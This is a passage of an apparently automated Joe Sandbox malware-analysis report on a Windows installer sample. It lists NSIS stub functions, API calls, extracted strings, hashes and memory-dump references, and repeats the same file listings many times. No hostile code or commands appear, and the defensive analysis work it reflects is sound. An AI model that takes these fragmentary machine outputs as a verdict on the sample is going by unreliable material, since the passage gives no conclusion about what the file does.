Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
Instruction ID: 930d0106ac8f21ffe7c218431e73a7c1b7ebb2f3f08f251653cedcfd3481038f
Opcode Fuzzy Hash: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
Instruction Fuzzy Hash: 67A1E6B1540301AAD720BF619D0AE2B3EACEF50745F15483FF582B61D2DBBD89448B6E

Function 00406312 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
GetProcAddress.KERNEL32(00000000), ref: 0040633D

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 74a8a5aaaf3dd8a694d56da61a16f6303afc7614e5bdd8def9870afc0854d2e9
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: BCD0123120011597D6001B65AE0895F776CEFA5611707803EF942F3131FB34D515A6EC

Function 004062EB Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007DA700,007D5AF8,004067E4,007D5AF8), ref: 004062F6
FindClose.KERNEL32(00000000), ref: 00406302

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
Instruction ID: 5e506215f2711f0e24a615dbcf2ef03c94eb3d964d91be164e4c0db9e35754d2
Opcode Fuzzy Hash: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
Instruction Fuzzy Hash: 80D012315141206FD34017386E4C88B7A68AF063303314B36F4A6F12E0C634CC3786ED

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,?), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,0084A0B0,?,000000E6,0040F0D0,?,?,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Call: %d, xrefs: 0040165A
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes failed., xrefs: 004017A1
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF
detailprint: %s, xrefs: 00401679
Rename: %s, xrefs: 004018F8
Rename on reboot: %s, xrefs: 00401943
Jump: %d, xrefs: 00401602
BringToFront, xrefs: 004016BD
Rename failed: %s, xrefs: 0040194B
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
Instruction ID: 748122a4b1e4c8b0444bddd0dc60868c48b22d194fcfef730b64eaf2fe916135
Opcode Fuzzy Hash: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
Instruction Fuzzy Hash: 3CB1D172A01204EFDB107FA1DD459AE3B78EF05354B25817FF942B62E1DA3D8A40CA6D

Function 00405942 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D

lstrcatW.KERNEL32(008520C0,007C5A78), ref: 004059C4
lstrlenW.KERNEL32(007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000,00000006,008420A0), ref: 00405A46
lstrcmpiW.KERNEL32(007E0D58,.exe,007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000), ref: 00405A59
GetFileAttributesW.KERNEL32(007E0D60), ref: 00405A64

Part of subcall function 00405F67: wsprintfW.USER32 ref: 00405F74

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,008460A8), ref: 00405ACD
RegisterClassW.USER32(007E9580), ref: 00405B20
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B38
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B71

Part of subcall function 00403EAB: SetWindowTextW.USER32(00000000,007E95E0), ref: 00403F46

ShowWindow.USER32(00000005,00000000), ref: 00405BA7
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BB8
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BC3
GetClassInfoW.USER32(00000000,RichEdit20A,007E9580), ref: 00405BD3
GetClassInfoW.USER32(00000000,RichEdit,007E9580), ref: 00405BE0
RegisterClassW.USER32(007E9580), ref: 00405BE9
DialogBoxParamW.USER32(?,00000000,0040548F,00000000), ref: 00405C08

Strings

.exe, xrefs: 00405A53
Control Panel\Desktop\ResourceLocale, xrefs: 00405988
RichEd20, xrefs: 00405BB3
RichEd32, xrefs: 00405BBE
_Nb, xrefs: 00405AE7
.DEFAULT\Control Panel\International, xrefs: 004059AF
`~, xrefs: 00405A0C
xZ|, xrefs: 0040597B
b~, xrefs: 00405A35
RichEdit20A, xrefs: 00405BCC, 00405BD1
RichEdit, xrefs: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`~$b~$xZ|
API String ID: 608394941-1309837594
Opcode ID: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
Instruction ID: f5a039cb880b9eaee1ecdf0536d3c824aabf016c99065ad96b2918c6fc8c0824
Opcode Fuzzy Hash: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
Instruction Fuzzy Hash: 0A718071600605AED710ABA5AD85E3B37ACEB84748F00413EF941B62E2DB7C5C51CE6D

Function 0040359D Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035AE
GetModuleFileNameW.KERNEL32(00000000,0085E0D8,00002004,?,?,?,00000000,00403A5D,?), ref: 004035CA

Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

GetFileSize.KERNEL32(00000000,00000000,008620E0,00000000,0084E0B8,0084E0B8,0085E0D8,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00403616

Strings

soft, xrefs: 0040368B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037DB
Null, xrefs: 00403694
Error launching installer, xrefs: 004035ED
Inst, xrefs: 00403682

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
Instruction ID: 2d5e6ab7a624250aa0c4fc4e0edfbfc1f0b135b6de304195c1858c8edc22daf3
Opcode Fuzzy Hash: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
Instruction Fuzzy Hash: A151B5B1900204ABDB209F65DD85BAE7FACEB04756F14853BEA00B72D1D73D9A44CB5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033EB
GetTickCount.KERNEL32 ref: 0040346E
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040349B
wsprintfW.USER32 ref: 004034AE
WriteFile.KERNELBASE(00000000,00000000,00427150,0040377C,00000000), ref: 004034DF
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040355C

Strings

... %d%%, xrefs: 004034A8
P1B, xrefs: 004033AB
PqB, xrefs: 0040344B, 00403466, 004034F3

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$PqB
API String ID: 651206458-1415242759
Opcode ID: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
Instruction ID: fe8561038ca0c1f851d54235c72d98e4424113abdfb89388266e227e9cd06809
Opcode Fuzzy Hash: 18372cb804754b34bf2e2d58d5ea3eaed026bf3a7fa6db410709b4b609b292b8
Instruction Fuzzy Hash: E8617B7190021AEBCF10DF65E9846AF7BA8AB04316F14453BF905B6290DB789F50CBA9

Function 00405E95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EB3
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403814,008520C0,008560C8), ref: 00405ECE

Strings

nsa, xrefs: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: fc3ef10fc4e670788618d569d9e14e1d65dd7a664a0663973dbebc503530dd57
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: C9F09675610604BBDB10CF59DD05A9FBBADEF94710F10803BEA45E7150E6B09E44C758

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
Instruction ID: 4a7c6b10ca187eba816588ea1d9201846d19603f0f5fc62a4a658fec9e55caff
Opcode Fuzzy Hash: a45af70f12a2ff9289efdc41b9adff97a1dd73ee066bf74a3cdcdad6e34fb976
Instruction Fuzzy Hash: 22F0F432A10220DBDB165B349D44B263698AB44750F68863BF911FA2F1D67CCC128B5C

Function 00405E66 Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E46 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,00406E97,?,?,?), ref: 00405E4A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E5D

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: bfdd682a7b15487adc9015e6c601711f35dcdd947f77102e263bd76fd4388c72
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: C1C01271404800AAC6010B34DF0881A7A26AB90370B298B3AB0BAE00F0CB3088A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
